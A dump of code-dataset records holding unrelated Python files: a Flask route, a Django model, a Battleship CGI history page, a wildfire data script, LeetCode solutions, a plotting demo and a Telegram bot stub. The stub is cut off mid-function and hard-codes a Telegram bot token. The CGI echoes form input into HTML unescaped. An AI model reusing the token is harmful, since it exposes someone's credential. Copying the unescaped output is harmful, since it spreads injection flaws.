| UTF-8 | Python | false | false | 247 | py | 1,916 | agc003_b.py | 1,075 | 0.493927 | 0.445344 | 0 | 13 | 18 | 45 |
davidwchung/GatorTrader | 16,612,933,518,777 | 6acf0adb0d0badfd3f632f80e5c295e20723f40d | e8da654734204192dabf27d22f08840d120196d4 | /application/server/routes/users.py | c08d322204f3a3406953e495b7f6930796da235f | [
"MIT"
]
| permissive | https://github.com/davidwchung/GatorTrader | 74710533cf52735f77b1335e2ad9ffabb69b42ed | 73b3abc64a313534658c2fcbb3826009e162a07d | refs/heads/master | 2023-03-23T07:37:06.791582 | 2020-06-12T23:10:00 | 2020-06-12T23:10:00 | 271,899,430 | 0 | 0 | MIT | false | 2021-03-20T04:11:58 | 2020-06-12T22:16:52 | 2020-06-12T23:10:07 | 2021-03-20T04:11:57 | 5,980 | 0 | 0 | 1 | HTML | false | false | from flask import Blueprint, send_from_directory, render_template
users_blueprint = Blueprint('users_server',
__name__,
static_folder='../client',
template_folder='../client/public/users')
@users_blueprint.route('/users/<path:name>', methods=["GET", "POST"])
def render_users(name):
return render_template('/{}.html'.format(name)) | UTF-8 | Python | false | false | 421 | py | 79 | users.py | 29 | 0.570071 | 0.570071 | 0 | 11 | 37.363636 | 69 |
adarsh01-debug/KnowYourGame | 7,121,055,802,074 | eadb2ecfcb93878f0f901e9c4fcd89a2c8b1986e | ddeaab21955f1968e024a0e537f73cb48ab8a726 | /GameReq/ReqApp/models.py | a44db84a54c8350efa4da22c72a30fbae87b5a67 | []
| no_license | https://github.com/adarsh01-debug/KnowYourGame | 9a9d44a01feccd249714df5095dd7387e0c932f0 | 7d9b28d0fa0805825b0c11b9eef3554d512a8362 | refs/heads/main | 2023-02-27T17:35:46.342818 | 2021-02-07T08:18:45 | 2021-02-07T08:18:45 | 336,737,806 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
# Create your models here.
class Requirements(models.Model):
img = models.ImageField(upload_to='pics')
name = models.CharField(max_length=50)
CPU = models.TextField(max_length=100)
RAM = models.CharField(max_length=50)
GPU = models.TextField(max_length=100)
HDD = models.TextField(max_length=100)
OS = models.TextField(max_length=100)
def __str__(self):
return self.name
| UTF-8 | Python | false | false | 442 | py | 10 | models.py | 8 | 0.690045 | 0.653846 | 0 | 14 | 30.571429 | 45 |
fykx/fykx-geo | 4,526,895,536,387 | d0c6b5f5668976a04721706c80cc7ea805fe28e1 | f80fd1a3bd09c517a80d65b59fed5dfa7a2cd560 | /test.py | a05cd779ede973f1f5db2597768a563d9b1e7703 | [
"MIT"
]
| permissive | https://github.com/fykx/fykx-geo | f120098321153c3085836c451b802d9a8f6cfbcf | 24ea5ea52595389c51944c600b77f59045fbeeb6 | refs/heads/master | 2023-01-08T14:24:08.574353 | 2020-11-03T08:34:46 | 2020-11-03T08:34:46 | 305,695,113 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from fykx.f3DAnalyst import raster_extent
def listdatas(pathin):
import os
_datas = []
_names = []
for _root, _dirs, _files in os.walk(pathin):
if len(_files) != 0:
for _file in _files:
_names.append(_file.split("_")[0])
_vv = None
if _file.endswith('.tif'):
_vv = os.path.join(_root, _file)
_datas.append(_vv)
_mosaic_datas = []
for _name in list(set(_names)):
for _data in _datas:
if _data.split('/')[-1].split('_')[0] == _name:
_mosaic_datas.append(_data)
break
return _mosaic_datas
def main():
pathin = r'/mnt/e/r1'
pathout = r'/mnt/e/r1/out'
datas = listdatas(pathin)
for data in datas:
raster_extent(data, pathout)
return
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 904 | py | 7 | test.py | 6 | 0.474558 | 0.466814 | 0 | 37 | 23.405405 | 59 |
milkyway007/BattleShip-2 | 7,206,955,154,302 | 9568c733a046acd090fd609af49407e52406b6b1 | d49a9b1410f2755bb13d1725ef36adb4f89e12e3 | /cgi-bin/second.cgi | be4015677d835c148555476e03b332b62ad576d3 | []
| no_license | https://github.com/milkyway007/BattleShip-2 | b987ead6b87209d06bd27cd6e166e32a07045283 | 23de495060d96bd4aebfd36923fac7949fd7d1ea | refs/heads/master | 2020-02-29T14:51:12.524277 | 2016-09-30T12:19:17 | 2016-09-30T12:19:17 | 69,613,894 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
import cgi
import cgitb
import datetime
import operator
from operator import itemgetter
from decimal import Decimal
import re
cgitb.enable()
print "Content-type: text/html"
print
form=cgi.FieldStorage()
timestamp = ''
playerOne = ''
playerTwo = ''
pointsOne = ''
pointsTwo = ''
gameTime = ''
winner=''
list = []
sortval = ''
def printHeader(dir):
message = "History of Games"
print "<h3>" + message.upper() + "</h3>"
print '<table>'
print "<tr>"
print '<th>NR</th>'
print '<th><a href=\'?sort=timestamp&dir=' + dir + '\'>DATE/TIME</th>'
print '<th><a href=\'?sort=winner&dir=' + dir + '\'>WINNER</th>'
print '<th><a href=\'?sort=playerOne&dir=' + dir + '\'>PLAYER A</th>'
print '<th><a href=\'?sort=playerTwo&dir=' + dir + '\'>PLAYER B</th>'
print '<th><a href=\'?sort=pointsOne&dir=' + dir + '\'>POINTS A</th>'
print '<th><a href=\'?sort=pointsTwo&dir=' + dir + '\'>POINTS B</th>'
print '<th><a href=\'?sort=duration&dir=' + dir + '\'>DURATION</th>'
print "</tr>"
def printHeaderForSortedResults(dir, player):
message = "History of Games"
print "<h3>" + message.upper() + "</h3>"
print '<table>'
print "<tr>"
print '<th>NR</th>'
print '<th><a href=\'?sort=timestamp&dir=' + dir + '&filterBy=' + player + '\'>DATE/TIME</th>'
print '<th><a href=\'?sort=winner&dir=' + dir + '&filterBy=' + player + '\'>WINNER</th>'
print '<th><a href=\'?sort=playerOne&dir=' + dir + '&filterBy=' + player + '\'>PLAYER A</th>'
print '<th><a href=\'?sort=playerTwo&dir=' + dir + '&filterBy=' + player + '\'>PLAYER B</th>'
print '<th><a href=\'?sort=pointsOne&dir=' + dir + '&filterBy=' + player + '\'>POINTS A</th>'
print '<th><a href=\'?sort=pointsTwo&dir=' + dir + '&filterBy=' + player + '\'>POINTS B</th>'
print '<th><a href=\'?sort=duration&dir=' + dir + '&filterBy=' + player + '\'>DURATION</th>'
print "</tr>"
def findFormValueByKey(keyValue):
variable = ''
if form.has_key(keyValue):
variable=form[keyValue].value
return variable
def writeData():
timestamp=findFormValueByKey("timestamp")
winner=findFormValueByKey("winnerForCGI")
playerOne=findFormValueByKey("playerOne")
playerTwo=findFormValueByKey("playerTwo")
pointsOne=findFormValueByKey("pointsOne")
pointsTwo=findFormValueByKey("pointsTwo")
gameTime=findFormValueByKey("gameTimeTwo")
open('file', 'a').close
f = open('file', 'r')
for line in f:
if not line:
continue
line = line.strip()
s = line.split(",")
list.append(s)
f.close()
number = len(list) + 1
data = str(number) + ',' + timestamp + ','+ winner + ','+ playerOne + ',' + playerTwo + ',' + pointsOne + ',' + pointsTwo + ',' + gameTime + '\n'
f = open('file', 'a')
f.write(data)
f.close()
def getCapOfHTML(fileName):
x = open(fileName, 'r')
cap=x.read()
x.close()
return cap
def printEndOfHTML():
knopka = "go back"
link = "http://dijkstra.cs.ttu.ee/~Liidia.Laada/prax3/single.html"
print '<a href="' + link + '" id="back">' + knopka.upper() + '</a>'
print "</body>"
print "</html>"
def processLine(line):
line = line.strip()
s = line.split(",")
list.append(s)
return s
def composeTableData(sth):
s = '<td>' + sth + '</td>'
return s
def readData():
print getCapOfHTML('../prax3/history.html')
printHeader("up")
open('file', 'a').close
f = open('file', 'r')
for line in f:
if not line:
continue
print "<tr>"
s = processLine(line)
for el in s:
print composeTableData(el.strip())
print "</tr>"
f.close()
print "</table>"
printEndOfHTML()
def sortData():
sortval = form['sort'].value
playerName = playerOne=findFormValueByKey("filterBy")
num = 0
if sortval == 'timestamp':
num = 1
if sortval == 'winner':
num = 2
if sortval == 'playerOne':
num = 3
if sortval == 'playerTwo':
num = 4
if sortval == 'pointsOne':
num = 5
if sortval == 'pointsTwo':
num = 6
if sortval == 'duration':
num = 7
oneMoreList = []
for s in list:
newS = makeNewArray(s)
oneMoreList.append(newS)
direction = form['dir'].value
newList = []
oppositeDirection = False
if direction == 'up':
newList = sortList(num, oneMoreList,oppositeDirection)
direction='down'
elif direction == 'down':
oppositeDirection = True
newList = sortList(num, oneMoreList,oppositeDirection)
direction='up'
print getCapOfHTML('../prax3/history.html')
if form.has_key("filterBy"):
printHeaderForSortedResults(direction, playerName)
else:
printHeader(direction)
for n in newList:
print "<tr>"
for el in n:
newWord = ''
for word in el:
newWord += str(word)
print composeTableData(newWord)
print "</tr>"
print "</table>"
printEndOfHTML()
def sortList(num, listA, oppositeDirection):
listB = []
if num==1:
listB = sorted(listA, key=lambda x: convertToDateTime(x[1]), reverse = oppositeDirection)
elif num==3 or num==4:
listB = sorted(listA, key=lambda x: convertToNormalStr(x[num]), reverse = oppositeDirection)
elif num==7:
listB = sorted(listA, key=lambda x: convertToDecimal(x[7]), reverse = oppositeDirection)
else:
listB = sorted(listA, key=itemgetter(num), reverse = oppositeDirection)
return listB
def convertToDecimal(array):
normStr = ''
for part in array:
normStr += str(part)
normDec = Decimal(normStr)
return normDec
def convertToDateTime(array):
day=str(array[0])
month=str(array[2])
year=str(array[4])
hour=str(array[6])
min=str(array[8])
dateStr = year + "-" + month + "-" + day + "-" + hour + "-" + min
DTObj = datetime.datetime.strptime(dateStr, '%Y-%m-%d-%H-%M')
return DTObj
def convertToNormalStr(array):
changedArray = []
for part in array:
if type(part) == str:
changedArray.append(part.lower())
else:
changedArray.append(part)
return changedArray
def makeNewArray(array):
newArray = []
for s in array:
newS = makeArray(s)
newArray.append(newS)
return newArray
def makeArray(word):
parts = re.findall(r"[^\W\d_]+|\d+|[.,:\s]+", word)
newParts = []
for p in parts:
newP = convert(p)
newParts.append(newP)
return newParts
def convert(symbol):
if symbol.isdigit():
symbol = int(symbol)
else:
symbol = symbol
return symbol
def showGame():
gameFile = open("../prax3/index.html", "read")
toShow = gameFile.read()
gameFile.close()
print toShow
def showMessage():
first_line = ''
f = open('file', 'r')
lines = f.readlines()
first_line = lines[-1]
first_line = first_line.strip()
first_line = first_line.split(",")
f.close()
print getCapOfHTML('../prax3/score.html')
print "<div>GAME OVER!</div>"
print "<div>"
winner = first_line[2]
winnerName = ''
if winner == 'Player':
winnerName = first_line[3]
elif winner == 'Computer':
winnerName = first_line[4]
print winnerName.title()
print " won!</div>"
print "<div>Score of the game:</div>"
print "<table>"
print "<tr>"
message = "Winner"
print "<th>"+message.upper()+"</th>"
message = first_line[3].upper()
print "<th>"+message.upper()+"</th>"
message = first_line[4].upper()
print "<th>"+message.upper()+"</th>"
message = "TIME(IN SECONDS)"
print "<th>"+message.upper()+"</th>"
print "</tr>"
print "<tr>"
print "<td>"
print winnerName.title()
print "</td>"
print "<td>"
print first_line[5]
print "</td>"
print "<td>"
print first_line[6]
print "</td>"
print "<td>"
print first_line[7]
print "</td>"
print "</tr>"
print "</table>"
printEndOfHTML()
def startFilteringData():
print getCapOfHTML('../prax3/filter.html')
def filterGames():
playerOne=findFormValueByKey("playerOne")
print getCapOfHTML('../prax3/history.html')
printHeaderForSortedResults("up", playerOne)
open('file', 'a').close
f = open('file', 'r')
for line in f:
if not line:
continue
line = line.strip()
s = line.split(",")
name = s[3]
name = name.strip()
if name == playerOne:
print "<tr>"
list.append(s)
for el in s:
print composeTableData(el.strip())
print "</tr>"
f.close()
print "</table>"
printEndOfHTML()
def main():
if form.has_key("sort"):
if form.has_key("filterBy"):
playerOne=findFormValueByKey("filterBy")
f = open('file', 'r')
for line in f:
if not line:
continue
s = line.split(",")
name = s[3]
name = name.strip()
if name == playerOne:
list.append(s)
f.close()
else:
f = open('file', 'r')
for line in f:
if not line:
continue
s = processLine(line)
f.close()
sortData()
elif form.has_key("action") and form["action"].value=="write":
writeData()
showMessage()
elif form.has_key("action") and form["action"].value=="showHistory":
readData()
elif form.has_key("action") and form["action"].value=="filter":
startFilteringData()
elif form.has_key("filterGames") and form["filterGames"].value=="ok":
filterGames()
main()
| UTF-8 | Python | false | false | 8,741 | cgi | 16 | second.cgi | 7 | 0.63368 | 0.628875 | 0 | 371 | 22.555256 | 146 |
prescottsmith/Wildfires_2.0 | 14,379,550,535,361 | c00e4a420910ceee4e2a1e81398562e53ec05711 | 86961fba34ad9f9cc157f5a7c92f17e350ba4ca4 | /ref_data_setup.py | 7d45e0becea3270b4d5fa4d2b7923ebce36d74d5 | []
| no_license | https://github.com/prescottsmith/Wildfires_2.0 | bc450c689a6aa1c67b7f0ae84a5a6169ccafadbd | 8b3408e2f91b82823439a71685eeea7fd442cdc9 | refs/heads/main | 2023-01-01T00:45:39.094037 | 2020-10-19T12:03:53 | 2020-10-19T12:03:53 | 301,131,578 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #import kaggle utilities
#from kaggle.api.kaggle_api_extended import KaggleApi
import os
import datetime
import os.path
from os import path
from datetime import timedelta
import pandas as pd
owd = os.getcwd()
#Check if file/directory exists
def file_check(filepath):
result = os.path.exists(filepath)
return result
#Download Dataset from Kaggle
#def dataset_download():
#Authenticate with API Server
# api = KaggleApi()
# api.authenticate()
#Select kaggle page and specfic file to download
# page = 'rtatman/188-million-us-wildfires'
# page_file = 'FPA_FOD_20170508.sqlite'
# api.dataset_download_files(page, page_file)
#unzip sqlite file
# path_to_zip_file = 'FPA_FOD_20170508.sqlite/188-million-us-wildfires.zip'
# import zipfile
# with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
# zip_ref.extractall('FPA_FOD_20170508.sqlite/')
# # Connect to SQLite database and import Fires table
# import sqlite3
# import pandas as pd
# conn = None
# conn = sqlite3.connect('FPA_FOD_20170508.sqlite/FPA_FOD_20170508.sqlite')
# cur = conn.cursor()
# raw_df = pd.read_sql("""SELECT LATITUDE, LONGITUDE, FIRE_YEAR, DISCOVERY_DOY, STAT_CAUSE_DESCR, FIRE_SIZE_CLASS FROM fires WHERE FIRE_YEAR >2013""", con=conn)
# conn.close()
# raw_df.to_csv(r'2014-2015_raw.csv', index = False, header=True)
# delete downloaded sqlite file/folder
# import shutil
# shutil.rmtree(page_file)
# Define test_train_splits
def test_train_split(dataframe):
"""Split dataframe into train and test data. Returns Train 1st, Test 2nd"""
train = dataframe.sample(frac=0.8, random_state=100) # random state is a seed value
train = train.reset_index(drop=True)
test = dataframe.drop(train.index)
test = test.reset_index(drop=True)
return train, test
#fix issue with stat_cause spellings for folder assignment
def string_fixer(word):
new_word = word.replace(' ', '_')
new_word = new_word.replace('/', '_')
return new_word
#Boundaries defined for sentinel API requests (WIDTH & LENGTH ASSIGNED HERE)
def bbox_boundaries(dataframe):
boundaries = []
for i in range(len(dataframe)):
long = dataframe['LONGITUDE'][i]
lat = dataframe['LATITUDE'][i]
long_left = long - 0.026
long_right = long + 0.026
lat_bottom = lat - 0.018
lat_top = lat + 0.018
bound_list = [round(long_left, 5), round(lat_bottom, 5), round(long_right, 5), round(lat_top, 5)]
boundaries.append(bound_list)
dataframe['BBOX'] = boundaries
return dataframe
def add_date(dataframe):
new_dates = []
for i in range(len(dataframe)):
start_date = str(dataframe['FIRE_YEAR'][i]) + '-1-1'
DOY = dataframe['DISCOVERY_DOY'][i]
Date = datetime.datetime.strptime(start_date, '%Y-%m-%d')+ timedelta(float(DOY))
new_dates.append(Date.date())
dataframe['Date'] = new_dates
return dataframe
def cause_fixer(dataframe):
new_strings = []
for word in dataframe['STAT_CAUSE_DESCR']:
new_word = string_fixer(word)
new_strings.append(new_word)
dataframe['STAT_CAUSE_DESCR'] = new_strings
return dataframe
def reformatting(dataframe):
df = bbox_boundaries(dataframe)
df = add_date(df)
df = cause_fixer(df)
return df
def cause_splitter(dataframe, causes):
for cause in causes:
os.chdir(owd+'/Data')
if file_check(cause):
print("'"+str(cause)+"' "+"folder already exists")
else:
os.makedirs(cause)
print("'" + str(cause) + "' " + "folder created")
cause_df = dataframe[dataframe['STAT_CAUSE_DESCR']==cause]
cause_df = cause_df.reset_index(drop=True)
cause_df_train, cause_df_test = test_train_split(cause_df)
os.chdir(cause)
try:
os.makedirs('train')
print('Created train folder')
except:
print('train folder already created')
try:
os.makedirs('test')
print('Created test folder')
except:
print('test folder already created')
fixed_cause = string_fixer(cause)
train_path = 'train/'+str(fixed_cause)+'_2014_2015_train.csv'
test_path = 'test/'+str(fixed_cause)+'_2014_2015_test.csv'
cause_df_train.to_csv(train_path)
cause_df_test.to_csv(test_path)
print('Train and Test data saved in '+str(cause)+' folder')
return
def main_function():
owd = os.getcwd()
downloaded = file_check('2014-2015_raw.csv')
try:
os.makedirs('Data')
print('Data folder created')
except:
print('Data folder already exists')
os.chdir('Data')
if downloaded:
print('Reference data table has already been downloaded')
else:
print('Error')
exit()
#print('Reference data table has not been downloaded yet')
#print('Downloading now...')
#dataset_download()
#print('Reference data table downloaded')
os.chdir(owd)
raw_df = pd.read_csv('2014-2015_raw.csv')
df = reformatting(raw_df)
list_of_causes = set(df['STAT_CAUSE_DESCR'])
cause_splitter(df, list_of_causes)
os.chdir(owd)
print(' ')
print('Reference data is ready for Sentinel imagery download')
if __name__ == '__main__':
main_function()
| UTF-8 | Python | false | false | 5,392 | py | 33 | ref_data_setup.py | 6 | 0.631862 | 0.609421 | 0 | 182 | 28.626374 | 163 |
rayjay214/mini-lbs-platform | 12,429,635,375,534 | 474582f288b95c6d6dd1e69ab99806697d2ab751 | 250ad0e55decc4385235bf1c3136427db7d5c291 | /backend/cmd_handler/bin/cmd_handler.py | 5dd7cc341f5ec88ae56c3c94ffb9e5f9e217fce2 | []
| no_license | https://github.com/rayjay214/mini-lbs-platform | 09db143ce49307333a50300796a566d16e03c358 | 6bcca7c38d1e96fed63c2e80ae4a5c17888d90cc | refs/heads/master | 2020-11-29T06:59:45.020812 | 2020-03-11T06:34:04 | 2020-03-11T06:34:04 | 230,051,200 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import sys
import threading
import queue
import time
from confluent_kafka import Producer, Consumer
from globals import g_logger, g_cfg
from dev_pb2 import DownDevMsg, MsgType, UpDevMsg
from redis_op import RedisOp
import struct
def num_to_bcd(num):
packed = struct.pack('6B', *[(num // 10 ** i % 10 << 4) + (num // 10 ** (i - 1) % 10) for i in range(11, -1, -2)])
# print(''.join(f"\\{p:02x}" for p in packed))
return packed
def pack_char(character):
return struct.pack('c', character.to_bytes(1, byteorder='big'))
def pack_signed_char(character):
return struct.pack('b', character)
def xor_bytes(byteStr): # 按字节异或
if len(byteStr) == 1:
return byteStr
result = (struct.unpack('b', pack_char(byteStr[0])))[0] # 字符转成 signed char(对应python中的 int ) 后进行异或
for c in byteStr[1:]:
signed_c = (struct.unpack('b', pack_char(c)))[0]
result = result ^ signed_c
return pack_signed_char(result)
#consume cmd.content from web_bo
class CmdReqConsumer(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.consumer = Consumer({
'bootstrap.servers': g_cfg['kafka']['broker'],
'group.id': g_cfg['kafka']['group'],
'auto.offset.reset': 'earliest'})
self.queue = queue
self.counter = 1
def get_parser(self, protocol):
return {
't808' : self.t808_parser
}.get(protocol, None)
def trans0x7e(self, b_str):
b_dst = bytearray(1024)
b_dst[0] = b_str[0]
idx = 1
for ele in b_str[1:-1]:
if ele == 0x7e:
b_dst[idx] = 0x7d
idx += 1
b_dst[idx] = 0x02
idx += 1
elif ele == 0x7d:
b_dst[idx] = 0x7d
idx += 1
b_dst[idx] = 0x01
idx += 1
else:
b_dst[idx] = ele
idx += 1
b_dst[idx] = b_str[-1]
idx += 1
b_final = bytes(b_dst[:idx])
return b_final
def t808_parser(self, down_devmsg):
buf = bytearray(1024)
buf_idx = 0
struct.pack_into('>B', buf, buf_idx, 0x7e)
buf_idx += 1
struct.pack_into('>H', buf, buf_idx, 0x8300)
buf_idx += 2
struct.pack_into('>H', buf, buf_idx, len(down_devmsg.cmdreq.content.encode()))
buf_idx += 2
ba_phone = num_to_bcd(int(down_devmsg.cmdreq.imei))
struct.pack_into('>6s', buf, buf_idx, ba_phone)
buf_idx += 6
struct.pack_into('>H', buf, buf_idx, self.counter)
self.counter += 1
buf_idx += 2
struct.pack_into('>B', buf, buf_idx, 0x01)
buf_idx += 1
struct.pack_into('>{}s'.format(len(down_devmsg.cmdreq.content.encode())),
buf, buf_idx, down_devmsg.cmdreq.content.encode())
buf_idx += len(down_devmsg.cmdreq.content.encode())
xor = xor_bytes(buf[1:buf_idx])
struct.pack_into('>1s', buf, buf_idx, xor)
buf_idx += 1
struct.pack_into('>B', buf, buf_idx, 0x7e)
b_str = buf[:buf_idx + 1]
b_final = self.trans0x7e(b_str)
down_devmsg.comreq.content = b_final
print(down_devmsg)
def get_protocol_by_type(self, product_type):
for key in g_cfg['protocol']:
types = g_cfg['protocol'][key].split(',')
if product_type in types:
return key
return None
def process_msg(self, msg):
down_devmsg = DownDevMsg()
down_devmsg.ParseFromString(msg)
g_logger.info(down_devmsg)
redis_op = RedisOp(g_cfg['redis'])
dev_info = redis_op.getDeviceInfoByImei(down_devmsg.cmdreq.imei)
protocol = self.get_protocol_by_type(dev_info['product_type'])
if protocol is None:
g_logger.error('protocol not found, type:{}'.format(dev_info['product_type']))
return
parser = self.get_parser(protocol)
if parser is None:
g_logger.error('parser not found, protocol {}'.format(protocol))
return
parser(down_devmsg)
def run(self):
topics = []
topics.append(g_cfg['kafka']['cmdreq_topic'])
self.consumer.subscribe(topics)
while True:
try:
msg = self.consumer.poll(1)
if msg is None:
continue
if msg.error():
g_logger.info("Consumer error: {}".format(msg.error()))
continue
self.process_msg(msg.value())
except Exception as e:
g_logger.error(e)
self.consumer.close()
#consume cmd.resp from gw
class CmdRespConsumer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.consumer = Consumer({
'bootstrap.servers': g_cfg['kafka']['broker'],
'group.id': g_cfg['kafka']['group'],
'auto.offset.reset': 'earliest'})
def process_msg(self, str):
updev_msg = UpDevMsg()
updev_msg.pasreFromString(str)
print(updev_msg)
def run(self):
self.consumer.subscribe(list(g_cfg['kafka']['cmdresp_topic']))
while True:
try:
msg = self.consumer.poll(1)
if msg is None:
continue
if msg.error():
g_logger.info("Consumer error: {}".format(msg.error()))
continue
g_logger.info('Received message: {}'.format(msg.value().decode('utf-8')))
self.process_msg(msg.value())
except Exception as e:
g_logger.error(e)
self.consumer.close()
#after constructing binary
class CmdProducer(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
self.producer = Producer({'bootstrap.servers': g_cfg['kafka']['broker']})
def run(self):
while True:
self.producer.poll(0)
event = self.queue.get()
if event is None:
time.sleep(0.1)
self.process_event(event)
self.queue.task_done()
def delivery_report(self, err, msg):
if err is not None:
g_logger.info('Message delivery failed: {}'.format(err))
else:
g_logger.info('Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))
def process_msg(self, msg):
topic = self.setting.get(g_cfg['kafka']['cmd_binaryreq_topic'])
g_logger.info(msg)
self.producer.produce(topic, msg, callback=self.delivery_report)
| UTF-8 | Python | false | false | 6,762 | py | 161 | cmd_handler.py | 135 | 0.539125 | 0.523802 | 0 | 200 | 32.605 | 118 |
mueller14003/DM1-Python | 2,886,218,052,525 | 0c7cf6a56875d2e8e996256092e15586a61b5a65 | 5488cae78a03828aab7884ba2b0cf0e6b0eb1a64 | /vectors.py | 0658eea591dbaafe659a4b4125c20248c78f753f | []
| no_license | https://github.com/mueller14003/DM1-Python | f28c863fadfc5e6f51bee98180ba0fc8bfcd308a | 1c59cdaa974e53993576a3820ebae7614d39df5f | refs/heads/master | 2021-04-09T15:38:29.669722 | 2018-08-02T06:24:56 | 2018-08-02T06:24:56 | 125,588,790 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from math import *
i=6.6
j=2.6
m=6.5**2
magnitude=sqrt(((i*m)**2)+((j*m)**2))
print(magnitude) | UTF-8 | Python | false | false | 97 | py | 78 | vectors.py | 78 | 0.587629 | 0.494845 | 0 | 9 | 9.888889 | 37 |
pradoz/leetcode_pset | 4,088,808,901,790 | 9169ec90af5971786ccefd520831690bc5fa800d | 7ec1f76d7be4452fcc0507315cb3494c53124e9f | /py/n-ary-tree-postorder-traversal.py | f9c02487af5f8f67c2e370a0158a9310b0b6f8ee | []
| no_license | https://github.com/pradoz/leetcode_pset | 0939468fc5bac8256ed148b09eb0e0d79b146fea | 31fa2a9e2f4bee8eadd4670c6f2ceefd7a164a0c | refs/heads/master | 2023-05-05T07:37:02.393264 | 2021-05-20T17:08:15 | 2021-05-20T17:08:15 | 204,830,939 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
# Definition for a Node.
class Node:
def __init__(self, val, children):
self.val = val
self.children = children
"""
# Recursively
class Solution:
def postorder(self, root: 'Node') -> List[int]:
if not root:
return []
if root.children is None:
return [root.val]
result = []
res = []
for child in root.children:
res += self.postorder(child)
result += res
result.append(root.val)
return result
# Iteratively
class Solution:
def postorder(self, root: 'Node') -> List[int]:
stack = [root]
res = []
while stack and root:
n = stack.pop()
res.insert(0, n.val)
stack += n.children
return res
# Recursively with post_order_traversal function
class Solution:
def postorder(self, root: 'Node') -> List[int]:
res = []
def post_order_traversal(node: 'Node') -> None:
if not node:
return
for child in node.children:
post_order_traversal(child)
res.append(node.val)
post_order_traversal(root)
return res
# Iteratively with helper function to minimize work
class Solution:
def postorder(self, root: 'Node') -> List[int]:
res = []
def traverse_and_check(x: 'Node'):
# lets us reference it outside the scope without
# passing it as a parameter
nonlocal res
if x:
# if x has no children, just append x's val
if not x.children:
res.append(x.val)
else: # else append every child for every child
for child in x.children:
traverse_and_check(child)
res.append(x.val)
# End of traverse_and_check()
if root:
traverse_and_check(root)
return res
| UTF-8 | Python | false | false | 1,974 | py | 213 | n-ary-tree-postorder-traversal.py | 209 | 0.518744 | 0.518237 | 0 | 70 | 27.071429 | 63 |
spacetelescope/stregion | 5,789,615,947,018 | c859c0d78ae2c866ed3d4947ab4b2c8cb3daa529 | 5808b177ca5c9a3a84f01603809781642d18cf45 | /examples/demo_region_filter01.py | 066e761c6ab56ed241072639219c42006557b16a | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | https://github.com/spacetelescope/stregion | 659ab8091adcfae9817de8ea4439c6b1b040839e | 96f032849e69345aa9c31a52811235a61c4c8c25 | refs/heads/master | 2022-11-28T15:46:00.471438 | 2022-11-28T12:36:15 | 2022-11-28T12:36:15 | 138,785,965 | 0 | 3 | MIT | false | 2022-11-25T20:24:49 | 2018-06-26T19:52:12 | 2022-11-17T20:20:31 | 2022-11-25T20:24:48 | 988 | 0 | 3 | 0 | Python | false | false | try:
from astropy.io import fits as pyfits
except ImportError:
from astropy.io import fits as pyfits
from demo_helper import pyfits_card_fromstring
import matplotlib.pyplot as plt
import stregion
# read in the image
def demo_header():
cards = pyfits.CardList()
for l in open("sample_fits02.header"):
card = pyfits_card_fromstring(l.strip())
cards.append(card)
h = pyfits.Header(cards)
return h
header = demo_header() # sample fits header
shape = (header["NAXIS1"], header["NAXIS2"])
reg_name = "test.reg"
r = stregion.open(reg_name).as_imagecoord(header)
m = r.get_mask(shape=shape)
fig = plt.figure(1, figsize=(7,5))
ax = plt.subplot(121)
plt.imshow(m, origin="lower")
patch_list, text_list = r.get_mpl_patches_texts()
for p in patch_list:
ax.add_patch(p)
for t in text_list:
ax.add_artist(t)
# another region
reg_name = "test02.reg"
r = stregion.open(reg_name).as_imagecoord(header)
m = r.get_mask(shape=shape)
ax = plt.subplot(122)
plt.imshow(m, origin="lower")
patch_list, text_list = r.get_mpl_patches_texts()
for p in patch_list:
ax.add_patch(p)
for t in text_list:
ax.add_artist(t)
plt.show()
| UTF-8 | Python | false | false | 1,171 | py | 26 | demo_region_filter01.py | 17 | 0.684885 | 0.672075 | 0 | 54 | 20.666667 | 49 |
clarkngo/cjn-python | 15,917,148,814,168 | 9c3b64c25ef79febdc94e7235a32c905dee12f6e | 560212fbb6a00235edcbf1ec24188c3a077c67e3 | /test4/code/security(older).py | 7035257076063d863e80e18933824bf05e834ac5 | []
| no_license | https://github.com/clarkngo/cjn-python | 5c5d26d24cdd48d494dbab55a44dff406cf3e8b8 | 3cf8265eac72e0b8bfbd2a1f1869cbe4bd54e88b | refs/heads/master | 2020-03-12T03:15:49.899501 | 2018-04-20T22:59:59 | 2018-04-20T22:59:59 | 130,420,859 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | users = [
{
'id':1,
'username': 'bob',
'password': 'asdf'
}
]
username_mapping = {'bob': {
'id': 1,
'username': 'bob',
'password': 'asdf'
}
}
userid_mapping = { 1 : {
'id': 1,
'username': 'bob',
'password': 'asdf'
}
}
def authenticate(username, password):
user = username_mapping.get(username, None)
if user and user.password == password:
return user
def identity(payload):
user_id = payload['identity']
return userid_mapping.get(user_id, None)
| UTF-8 | Python | false | false | 481 | py | 12 | security(older).py | 8 | 0.602911 | 0.594595 | 0 | 32 | 14.03125 | 44 |
Kritik07/IOT | 5,068,061,429,809 | 18909720c64dac3c6ab2ea6932dbfde594a260de | f421e7704e62d665702ef173f7a5a6d8379f3e65 | /PRAC1.py | 264d27c24f21683c9403833be975fd88120c1a01 | []
| no_license | https://github.com/Kritik07/IOT | 1bfa875d563825ad19290998e17c38b4fc971888 | 07d3776f2702af62cbdf77a2a90d04ed120d7112 | refs/heads/master | 2022-12-17T00:14:22.338921 | 2020-09-14T13:52:50 | 2020-09-14T13:52:50 | 295,321,608 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import telepot
token='1234280727:AAFM3LKbA6dVZER3Cl2jXELfQhuPNgX2vOI'
bot = telepot.Bot(token)
print (bot.getMe())
def handle(msg):
